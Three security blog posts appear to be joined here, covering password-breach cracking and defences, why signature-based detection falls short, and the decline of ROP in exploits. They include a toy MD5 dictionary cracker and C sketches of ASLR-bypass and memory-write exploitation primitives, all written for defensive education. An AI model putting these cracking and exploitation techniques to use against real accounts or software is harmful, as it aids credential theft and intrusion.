Once the criminal steals the database, they often have to recover the passwords from the “hashed” form back to the actual plaintext password, allowing them to check it for likely reuse on other websites. This is accomplished by “brute forcing” the password hashes to recover anything that is computationally guessable (meaning, a password simple enough to be guessed by a wordlist or sequence of iterating characters, like AAAAA, AAAAB, AAAAC, and so on). This last factor highlights the importance of strong, complex passwords versus simple, easily-guessable passwords. If your password is a simple dictionary word, for example “baseball”, then it will almost certainly be very simple to recover from its hashed form. Conversely, if your password is long and complex then you are better protected from a large website breach, as it would be computationally infeasible for an attacker to brute force a sufficiently strong password.
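A toy sketch of such a dictionary attack follows (the passwords and wordlist are invented; OCaml's stdlib Digest module, which is MD5, is used purely for illustration; real services should store passwords with slow, salted hashes such as bcrypt or scrypt):

```ocaml
(* Illustration only: stdlib [Digest] is MD5. Real services should use
   slow, salted hashes to make wordlist attacks far more expensive. *)
let hash pw = Digest.to_hex (Digest.string pw)

(* A dictionary attack: hash every candidate word and compare against
   the stolen hash. Anything guessable by a wordlist falls immediately. *)
let crack stolen_hash wordlist =
  List.find_opt (fun candidate -> hash candidate = stolen_hash) wordlist

let () =
  let wordlist = [ "password"; "letmein"; "baseball"; "dragon" ] in
  (* A dictionary word is recovered instantly... *)
  (match crack (hash "baseball") wordlist with
   | Some pw -> Printf.printf "recovered: %s\n" pw
   | None -> print_endline "not recovered");
  (* ...while a long, random password appears in no wordlist. *)
  match crack (hash "c7#kP!x2Qz9w") wordlist with
  | Some pw -> Printf.printf "recovered: %s\n" pw
  | None -> print_endline "not recovered"
```

Real cracking tools iterate billions of candidates per second against fast hashes like MD5, which is why the only reliable defenses are password length, randomness, and slow hashing on the server side.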

An example of this is as follows:

  1. Hacker targets a popular social media website called MyBook
  2. Hacker finds a vulnerability or misconfiguration in the server hosting the website and uses it to gain access to the website.
  3. Hacker locates the database of all registered users and creates a backup
  4. Hacker downloads the database backup he created of users and hashed passwords
  5. Hacker runs the hashed passwords though a password cracker for a week and recovers 50% of the total passwords
  6. Hacker sells the usernames and recovered passwords to someone on an underground hacking forum
  7. The person that purchased the database uses an automated program that checks all of the usernames and passwords against other websites for password reuse and gains access to thousands of email, social media, and online banking accounts

 

How do people protect themselves?

There are several easy steps you can take to minimize the damage personally inflicted upon you by a password breach.

 

Use unique passwords on different websites

Imagine having the same key for your house, car, office, and gym locker. While it would be very convenient, it would be a nightmare if you lost it (or worse, if somebody stole it). Criminals gain access to multiple accounts on the Internet because they know that remembering passwords is hard and nobody likes to do it. By having unique passwords on different websites you are reducing the risk of a criminal gaining access to additional accounts as a result of stealing your password.

 

Use complex passwords

Complex passwords are essential: they are difficult to guess and difficult to recover from a compromised password hash. I recommend using passwords that are at least 12 characters long and include a mix of letters, numbers, and symbols. You should avoid words that appear in a dictionary, to make password guessing and brute-forcing more difficult.
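A back-of-envelope calculation shows why both length and character variety matter; the alphabet sizes below are illustrative, not prescriptive:

```ocaml
(* Keyspace size = alphabet_size ^ length, computed in floating point
   because large keyspaces overflow native integers. *)
let keyspace alphabet_size length =
  float_of_int alphabet_size ** float_of_int length

let () =
  (* 8 lowercase letters vs. 12 characters drawn from roughly 70
     symbols (upper/lowercase letters, digits, punctuation). *)
  let weak = keyspace 26 8 in     (* ~2.1e11 guesses *)
  let strong = keyspace 70 12 in  (* ~1.4e22 guesses *)
  Printf.printf "weak: %.2e  strong: %.2e  ratio: %.0e\n"
    weak strong (strong /. weak)
```

The second keyspace is more than ten billion times larger, which is the difference between a password recovered in minutes and one that is computationally infeasible to brute force.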

 

Use a password manager

Password managers are programs that run on your computer, in your web browser, or directly on your smartphone. Instead of thinking of a password every time you register on a website, the password manager generates a long, complex, random password that you don’t have to remember. Then, whenever you want to log back into that website, you visit your password manager and copy and paste the saved password directly into the website.  LastPass and 1Password are two examples of popular password managers.  It is also important to note that a password manager inherently accomplishes the previous two recommendations.

 

Use multi-factor authentication on all high value accounts

Multi-factor authentication is a security control that adds an additional layer of security beyond username and password. Multi-factor authentication can come in many different forms, but the most common are a smart phone app, hardware token, or text message codes. Once you’ve enabled multi-factor authentication, you’ll enter your username and password on a website and it will ask you for a third item (a number from an app or a text message).

This ensures that the person attempting to log into the account with your username and password also has your smart phone, and thus, is more likely actually you. Even if a criminal successfully steals your online banking username and password through a targeted email attack or from a third-party website breach, they will not be able to log into your account because they do not have access to your smart phone. The best part is that most major banking, social media, and email providers offer and encourage multi-factor authentication free of charge.

 

Conclusion

Unfortunately, password breaches and credential theft aren’t going anywhere soon. They are an unwelcome and inconvenient fact of life in the modern Internet era. As long as credential theft remains relatively easy, and the market continues to offer large financial rewards, your usernames and passwords will continue to be highly sought.   The good news is that it’s pretty straightforward to protect yourself from a large majority of the real threats to average computer users. All of the recommended protections are low cost and take no more than an hour to set up. By following these basic steps you can significantly reduce your risk exposure to any credential breach. Now go forth, secure yourself, and use the Internet with confidence.

Detecting Modern Adversaries: Why Signatures Are Not Enough


Cyber intrusions are continuing unabated with no end in sight. Ransomware is on the rise, massive data breaches are announced with such regularity that the public is becoming numb to their significance, and APTs continue to burrow deep into networks, going undetected for months or even years. At the same time, most organizations across all industries are increasing their cyber security budgets yet usually fail to produce a meaningful increase in defensive effectiveness.

In short, the adversary continues to win.  Fortunately, most security professionals and vendors are asking what must be done differently to increase defensive effectiveness.   We often hear that enhanced signature sharing is the primary solution.   From the other end, we hear that signatures are dead.  The truth lies in between.  

Signatures are effective in detecting a portion of what is already known and for hunting within your enterprise to understand the extent of a known intrusion.  However, due to their brittleness and increasing specificity to only the targeted victim, signatures are an utterly insufficient foundation for the caliber of detection and prevention capability needed today to prevent compromise or detect and remediate compromise as rapidly as possible.  

We need to do more.  We need to add additional layers of detection around signature and IOC search, looking for indications of attacker techniques at low levels in the system while simultaneously hunting for higher-order patterns which could indicate maliciousness across large sets of monitored hosts.  Moving from solely signature-based defenses to also including attacker techniques and patterns is the best way to maximize the defender’s chance of success in minimizing damage and loss.

 

Why aren’t signatures enough?

For the purpose of this post, we use the terms signature and Indicator of Compromise (IOC) interchangeably. A good signature is a feature that, with a low false positive rate, uniquely corresponds to a known attack campaign or piece of malware. We can group these into two buckets: network signatures and endpoint signatures.

 

On the network

Network signatures usually come in the form of blacklisted domains, IP addresses, URI structure, or patterns in command and control or other communications.  Two primary factors have massively reduced the effectiveness of network IOCs in recent years: attack infrastructure diversity and encryption.

First, adversaries know their infrastructure is a point of vulnerability in their campaigns and actively seek to diversify and blend in as much as possible.  The ubiquity of cloud services has been a major enabler for adversaries, allowing them to rapidly stand up and tear down infrastructure for low cost.  Others use legitimate cloud services for data exfiltration or command and control, bypassing a need for a dedicated C2 infrastructure.  Adversaries also engage compromised, unwitting nodes as disposable hop points.  Trying to keep up with every hop point to defend your network is not a winning strategy.

In the past, adversaries often used the same infrastructure across many victims for long periods of time. This is much less common today. High caliber adversaries will usually use infrastructure across many victims for only very short-lived campaigns, sometimes going so far as to use entirely unique infrastructure for all phases of an operation targeting a specific victim. Today, signatures may only be useful retrospectively to identify whether a newly discovered campaign (which may have taken place weeks or months ago) targeted you. Signatures may actually prompt you to waste resources searching for something an adversary never would have used to target you in the first place.

Next, encryption has made it far more difficult to track patterns on the wire.  Network-level pattern matching capabilities such as Snort or Bro signatures used to be relatively effective in detecting intrusions in your network.  Malware authors need to design structured command and control communications to organize victim machines and direct victims to take certain actions.  Analysts can often fingerprint these communications structures and detect them on the wire, even if unique or unknown infrastructure is in use.  However, we are increasingly seeing malware communicate within end-to-end encrypted tunnels, usually using universal protocols such as SSL or TLS.  When communications are encrypted, unless SSL proxying or other intrusive traffic inspection technology is put into place these patterns are not visible to network security appliances applying these signatures.  Thus, the signatures for the malicious malware communication patterns will not fire and the intrusion will go unnoticed.

 

On the Endpoint

Evidence of an intrusion on workstations and servers can be found in numerous locations, including malware hashes, filenames, registry entries, and much more.  As with network infrastructure, in the past, malware was regularly reused across many victims for long periods of time without diversifying these artifacts.  Adversaries with any level of sophistication no longer make these mistakes.  They have learned that it is important to avoid a detrimental (from their point of view) global impact from a single detection.  Defenders need to understand this and pursue intrusions accordingly.

Malware is often polymorphic, changing itself to have a unique hash every time and automatically diversifying filenames, persistence mechanisms, and other features which can be signatured.  In these cases, which are increasingly common, an artifact found in a single victim will not be effective as a global IOC.  Strategies that focus on patterns within malicious binaries themselves (Yara signatures, for example) can at times be relatively effective in detecting new tools from a given known malware family, but these can be difficult to use across an enterprise and are very prone to false positives.

In addition, some adversaries are moving entirely away from malware as their default way of accessing and interacting with a victim.  Legitimate credentials and administrative tools like Powershell are often all that is needed to take desired actions on a network.  Malware is often only used for persistence and sometimes not used at all.  In these cases, the adversary does not leave behind a significant footprint to be used as the basis of IOCs.  IOCs will be entirely ineffective and the problem turns into distinguishing malicious usage of tools and credentials from normal operations.

 

Do we still need signatures?

For the reasons described above, signatures are not a sufficient foundation for detection and prevention in your network.  That said, they are still valuable.  They are useful and effective in catching unsophisticated tools and actors.  They can also help you determine if a given attack campaign has touched your systems.

Search functionality is very important to locate known IOCs on your systems and in your traffic.  Signature search is also necessary to determine the extent of a given compromise in your environment.  For example, if you find evidence that a certain registry key is being used for persistence on a compromised host, you need a way to look across your other systems to look for that same key.  IOCs of this sort are useful much more often inside your network than they are to other possible victims of the same adversary.  IOC searching is a part of threat hunting, but it’s not enough.
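Conceptually, IOC search of this kind reduces to a set-membership check over artifacts collected from endpoints. A minimal sketch follows; the hostnames, hashes, and indicator list are all hypothetical:

```ocaml
module StrSet = Set.Make (String)

(* Hypothetical indicators; real ones would come from threat intel
   feeds or from artifacts found on a known-compromised host. *)
let known_bad_hashes =
  StrSet.of_list
    [ "aaaabbbbccccddddeeeeffff00001111"
    ; "1234123412341234abcdabcdabcdabcd" ]

(* Return the hosts where an observed file hash matches an indicator. *)
let hits observations =
  List.filter_map
    (fun (host, file_hash) ->
      if StrSet.mem file_hash known_bad_hashes then Some host else None)
    observations

let () =
  let observations =
    [ ("workstation-07", "aaaabbbbccccddddeeeeffff00001111")
    ; ("server-02", "ffffffffffffffffffffffffffffffff") ]
  in
  List.iter print_endline (hits observations)
```

The same membership test applies to registry keys, domains, or any other artifact; the hard part in practice is collecting the observations at scale, not the matching itself.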

 

So we need more.  What should we do?

We need technologies to detect threats without relying on signatures.  This takes two main forms: looking deep in the operating system for indications of malicious activity and hunting for suspicious patterns across key data from many systems.  Basically, we must look a layer below and a layer above IOC search.

There are a few well-established frameworks for understanding the sequencing and methodologies exhibited time and time again in cyber intrusions, such as Lockheed Martin’s Kill Chain and Mitre’s ATT&CK framework.  While adversaries constantly change and adapt malware, they actually use the same techniques over and over – process injection, credential dumping, token stealing, host enumeration, and lateral movement being a few examples of many.  An attacker can build a nearly infinite number of tools to do these things, generating different IOCs, but they must go through the same chokepoints in the OS to execute these actions on the system.  We can identify these key chokepoints, develop ways to detect and optionally automatically block the adversary, and alert the cyber security operations team that a malicious event has taken place.  Effective tools can prevent malicious activity at the right chokepoints in real time and alert the security team to a likely intrusion – all without signatures.

We also must look for suspicious activity and patterns across our endpoints.  This is the core of effective threat hunting, improving from simply finding what’s known to empowering security teams to find unknown and unique intrusions.  This is possible because adversaries leave a trail which can be followed.  Adversaries must operate on systems.  They must execute code. They usually communicate on the network. They often read, create, or modify files.  They do much more.  All of these breadcrumbs can be followed by an astute hunter.  The hunter can look at process activity information, network traffic, domain lookups, previously executed commands, persistence locations, and in other key areas.  Suspicious activity can be flagged, investigated, and detections can occur.  In this way, IOC search becomes a subset of hunting.
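One common hunt technique in this vein is “stacking”: tallying an artifact (process names, persistence entries, autorun keys) across many hosts and surfacing the rarest values for investigation. A hypothetical sketch with invented data:

```ocaml
module StrMap = Map.Make (String)

(* Tally how often each process name appears across observations
   collected from many hosts. All data below is made up. *)
let tally observations =
  List.fold_left
    (fun acc (_host, proc) ->
      let n = try StrMap.find proc acc with Not_found -> 0 in
      StrMap.add proc (n + 1) acc)
    StrMap.empty observations

(* Process names seen fewer than [threshold] times are "rare" and
   worth an analyst's attention. *)
let rare threshold observations =
  StrMap.fold
    (fun proc n acc -> if n < threshold then proc :: acc else acc)
    (tally observations) []

let () =
  let observations =
    [ ("ws-01", "explorer.exe"); ("ws-02", "explorer.exe")
    ; ("ws-03", "explorer.exe"); ("ws-02", "svch0st.exe") ]
  in
  List.iter print_endline (rare 2 observations)
```

Rarity alone does not prove maliciousness, which is why automation of this sort surfaces leads for a hunter rather than firing alerts directly.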

Hunting manually can be very difficult and will not scale.  However, by combining hunt methodologies with automation, analytics, and machine learning, hunt operations can be scaled and optimized.  Detections of unknown intrusions can be surfaced at speed and scale at this layer above traditional IOC search and then acted upon by the security team.    

 

Conclusion

We still need to use signatures.  It is important to have a capability to search for artifacts associated with known campaigns, to combat low caliber adversaries, and to pivot through your network once a unique adversary is discovered via other means.  

Signatures are not enough to form the detection and prevention solution needed to defend against modern threats.  They are neither effective on the host nor at the network level to detect advanced adversaries.  Additional detection capabilities which look at low level chokepoints in the operating system are necessary, as are simultaneously executed hunt operations across systems for indications of suspicious or malicious activity.  By combining hunting with automation, analytics, and machine learning, we can produce high quality detections which can be used by security operations teams in the same fashion as detections from chokepoint monitoring and signature monitoring.  

Combining these three layers - low-level attacker techniques detections, signature-based detections, and detections from automated hunts - maximizes the chances of stopping adversaries before they succeed.

ROP is Dying and Your Exploit Mitigations are on Life Support


Too often the defense community makes the mistake of focusing on the what, without truly understanding the why. This mindset often leads to the development of technologies that have limited effectiveness, and an even shorter shelf life. Time and again we’ve seen newly developed software protections bypassed shortly after their release.  This is especially true with exploit mitigations, and Return-Oriented Programming (ROP) in particular. In short, current defenses target obsolete offensive techniques.

The offensive community has known something for a long time that I would like to share with you. ROP is dying and ROP exploit mitigations aren’t as effective as you might think.

 

A Brief History of ROP

First, let us take a step back and look at what ROP is, and why many third party security products have ROP defenses. Over a decade ago, processor manufacturers began to add hardware enforcement of page level permissions. This support enabled operating systems to restrict code from executing anywhere in memory, a common exploit technique. Microsoft implemented this restriction in Windows XP Service Pack 2, and named it Data Execution Prevention, or DEP.

As Microsoft Windows and other operating systems introduced these countermeasures, researchers were quick to devise creative ways to bypass them. In his seminal paper, Sebastian Krahmer lays out what would eventually be named Return-Oriented Programming. Krahmer’s paper was published on September 28th 2005, shortly after DEP and similar mitigations went mainstream.

Since its publication, dozens of research papers, conference presentations, and exploits have used some form of Krahmer’s idea of reusing legitimate code to circumvent DEP, and ROP became enemy number one.

Techniques for building ROP “gadgets” have varied over the last ten years, but the core purpose remains: build a stack of legitimate code locations, each ending in a return, that when executed gives the attacker the ability to execute their arbitrary payload.

After a decade of study, defenders have come to understand key artifacts to detect and prevent these gadgets from changing permissions or executing code. This has led to add-on security solutions like Microsoft’s own “Enhanced Mitigation Experience Toolkit”, or EMET. But while security vendors were working on the ROP problem, attackers were overcoming a bigger issue: ASLR.

Address Space Layout Randomization (ASLR) is a defensive method for randomly assigning virtual addresses to code and data in a running program. ASLR aims to prevent an attacker from using previous knowledge of the address space to gain an advantage and execute malicious code. This has proven extremely effective in “raising the bar” of exploitation and is one of the most significant research challenges when building weaponized exploits.

Microsoft introduced ASLR in Windows Vista, but did not comprehensively implement it until sometime in 2011, when it recompiled all system libraries to take advantage of it. While ASLR has proven to be effective, it must be enforced on every module and memory region in a program; if even one piece is left unrandomized, the whole scheme falls apart. Until fairly recently, exploit writers abused this loophole to bypass the mitigation.

As “full” ASLR has become the norm, attackers have needed to read memory from within their exploit code to determine what data to target for a successful exploit. This step in exploit development is one of the most time consuming, but also the most powerful: in many cases, an exploit that can read the target address space to bypass ASLR can also write into it.
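A memory-read primitive is so powerful because ASLR slides a whole module by a single offset, so distances between items inside it stay fixed across runs. A minimal sketch of that bypass logic, using this program’s own functions as stand-ins for a leaked pointer and the attacker’s real target (the names and scenario are hypothetical):

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

static int leaked_function(void) { return 1; } /* address the exploit reads  */
static int target_function(void) { return 2; } /* address the exploit wants */

/* ASLR relocates a module as a unit, so the delta between two symbols
 * in the same module is identical in every run. An attacker who knows
 * the delta from a local copy of the binary recovers the target from a
 * single leaked pointer -- no gadget hunting required. */
int (*recover_target(int (*leak)(void), ptrdiff_t known_delta))(void)
{
    return (int (*)(void))((uintptr_t)leak + (uintptr_t)known_delta);
}
```

(The function-pointer arithmetic here is implementation-defined C, but it mirrors what exploit code does with raw leaked addresses.)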

In short, the ability to read and write memory makes ROP unnecessary and is the reason Return-Oriented Programming is dying.

 

ROP is Dying

In 2014 Yang Yu presented “Write Once, Pwn Anywhere” at Blackhat USA. This presentation is a great demonstration of using a read and write “primitive” to make a small change that has a significant impact. In his presentation and proof-of-concept, Yu corrupts the Jscript.dll “safemode” flag stored in memory to enable the use of the WScript.Shell COM method. This method can be used to execute shell commands and is normally protected in Internet Explorer for obvious reasons. However, by changing the “safemode” value in memory, an attacker can bypass this restriction and execute arbitrary commands, without needing Return-Oriented Programming techniques.
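Jscript.dll’s actual layout is internal to Microsoft’s implementation, but the shape of Yu’s attack is generic: a privileged code path guarded by nothing more than a flag sitting in readable/writable memory. A hypothetical sketch (all names and the struct layout are mine, for illustration only):

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical interpreter state: a "safemode" flag guards shell
 * access, mirroring the Jscript.dll flag Yu corrupted. */
struct interp {
    bool safemode;    /* true: dangerous COM methods are blocked */
};

/* Legitimate API: refuses to run commands while safemode is set. */
int run_shell_command(struct interp *ip, const char *cmd)
{
    (void)cmd;
    if (ip->safemode)
        return -1;    /* blocked */
    return 0;         /* would execute cmd here */
}

/* The attacker's arbitrary-write primitive (a stand-in for whatever
 * vulnerability provides it): one byte written at a chosen address.
 * No ROP chain, no new code pages, no mitigation artifacts. */
void write_primitive(uint8_t *addr, uint8_t value)
{
    *addr = value;
}
```

One well-placed byte turns a locked-down scripting engine into a command launcher, which is why ROP-focused mitigations never see anything happen.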

Shortly after the presentation, researchers used Yu’s idea to exploit a VBScript vulnerability (CVE-2014-6332). Again, the exploit writer overcame the difficult problem of getting arbitrary memory read and write access, then used that to gain full-system access without tripping any software mitigations such as EMET.

Earlier this year, a component of the Angler exploit kit targeted a vulnerability in Silverlight (CVE-2016-0034) using a similar approach. First, trigger a vulnerability that gives programmatic read and write of virtual memory, and then overwrite critical data to gain code execution. In this exploit the writers were very clever. Instead of flipping a bit, like the previous examples, they created legitimate code in executable memory using Silverlight’s JIT engine. To gain code execution without ROP they overwrote their legitimate code page with their payload, absolving themselves of DEP restrictions, and EMET was none the wiser.

Finally, let’s look at a trend in several popular exploit kits that demonstrates the increased use of “ROP-less” techniques, like the previous examples, to exploit software. My colleague Matt Spisak astutely linked the change after CVE-2015-5119 to a technique originally developed by researcher Vitaly Toropov. Toropov’s technique, like the Silverlight one before it, uses a clever method to bypass DEP without needing ROP. When the technique became public through the HackingTeam leak, the exploit kit authors quickly updated their exploits, and they have completely bypassed EMET ever since.

These examples demonstrate some of the ways new exploit techniques are less reliant on Return-Oriented Programming. Many more techniques exist publicly, and as the HackingTeam leak proved, private and therefore unknown techniques exist, too. If you enjoy the art of exploitation, I strongly recommend the articles above, which dive into each technique in great detail.

Exploit Kit

The exploit kit graph above illustrates the declining utility of ROP particularly well. It also demonstrates the fragility of ROP-based exploit mitigations: a single shift in exploit technique trends can have a dramatic and long-lasting effect.

 

Towards Earlier Detection

As attackers have moved away from ROP and toward more advanced, and frankly harder to detect, techniques for executing payloads, what can we do?

Recently, vendors such as Microsoft have recognized that ROP defenses are not enough. In Visual Studio 2015, Microsoft introduced Control Flow Guard (CFG). This new compiler-based mitigation attempts to eliminate the ability to exploit certain classes of vulnerabilities. Unfortunately, to take advantage of CFG, code must be recompiled with the latest compiler and options. Alternatively, we have introduced a similar approach in the latest version of our product that works on any software, without recompilation. So why have Microsoft and Endgame invested in locking down control flow?

Over the years the industry has come to the conclusion that it is impossible to eliminate vulnerabilities. We also know that exploit authors are incredibly creative. The biggest impact we can have on the success of exploits is to limit the opportunity for creative bypasses. To oversimplify, exploits have to trigger a vulnerability, and then “do something”. Anti-exploit solutions need to disrupt this “something” early in the stages of exploitation to maintain an advantage.
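CFG’s real implementation uses a per-module bitmap maintained by the compiler and loader, but the underlying idea of disrupting the “do something” step can be sketched simply: before every indirect call, check the target against the set of known-good entry points, and refuse to jump anywhere else. A hedged, simplified illustration (the table and helper names are mine, not CFG’s API):

```c
#include <assert.h>
#include <stddef.h>

typedef void (*handler_fn)(int *);

static void inc_handler(int *x) { (*x)++; }
static void dbl_handler(int *x) { (*x) *= 2; }

/* Set of valid indirect-call targets, analogous to the per-module
 * bitmap CFG builds at compile and load time. */
static const handler_fn valid_targets[] = { inc_handler, dbl_handler };

/* Guard check inserted before every indirect call: if the target is
 * not a known-good entry point, refuse to jump into attacker data. */
static int cfg_check(handler_fn target)
{
    for (size_t i = 0; i < sizeof valid_targets / sizeof valid_targets[0]; i++)
        if (valid_targets[i] == target)
            return 1;
    return 0;
}

/* Dispatch through the guard; returns 0 on success, -1 if blocked
 * (real CFG raises a fast-fail exception instead of returning). */
int guarded_call(handler_fn target, int *arg)
{
    if (!cfg_check(target))
        return -1;
    target(arg);
    return 0;
}
```

The design point is timing: the check fires during the Exploitation stage, at the first hijacked control transfer, rather than after a payload is already running.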

To demonstrate, consider the following graphic that illustrates the high-level stages of an exploit.

Exploitation Process

This progression highlights where the fight must happen. Most exploit prevention products continue to focus on the “Post-Exploitation” stage, and by that time the attacker will almost always win. In Post-Exploitation, an attacker typically has the ability to execute some code on the target system, or has gained adequate control over the program; this is the case with Return-Oriented Programming techniques. By this stage, defense has lost. Instead, real defense must fight in the “Exploitation” stage of the attack. At this point, defenders still have the advantage of preventing successful exploitation and can stop attackers from achieving their objectives.

Endgame’s solution to the problem takes a different approach than most vendors. Like Microsoft, we believe guarding control flow is the first step in building better prevention. However, we want customers to take advantage of the technology without having to recompile their code.

To achieve this we have developed a new concept we’re calling Hardware Assisted Control Flow Integrity, or HA-CFI. This technology utilizes hardware features available in Intel processors to monitor and prevent exploitation in real-time, with manageable overhead. By leveraging hardware features we can detect exploits before they reach the “Post-Exploitation” stage, and provide stronger protections, while defense still has the upper hand.

 

Conclusion

For the time being, ROP defenses still provide some protection, especially against commodity and less advanced exploits, or when reading and writing memory is impossible. However, ROP’s death is imminent, and the security community must acknowledge it rather than be lured into a false sense of security while a large number of successful attacks go unnoticed.

Next-generation exploit defense must detect and prevent exploitation patterns in earlier stages of the process to maintain the defensive advantage needed to limit exploit authors’ creativity and effectively block them. At Endgame, we understand the fragility of “Post-Exploitation” preventions. Good exploit mitigations greatly reduce the attacker’s opportunity. If you’d like to hear more, come see the latest research we are presenting this summer at Blackhat USA, titled “Capturing 0day Exploits with PERFectly Placed Hardware Traps”. If you can’t make it to Vegas, I’ll also host a webinar covering this topic on August 17.

This is an exciting time for exploit mitigations as software vendors continue to make important changes that reduce the impact of vulnerabilities and security vendors such as Endgame push the state-of-the-art in third party detection and prevention. While ROP, and defenses against it, may be showing their age, there is still a lot of opportunity for new and effective solutions to the exploit problem.
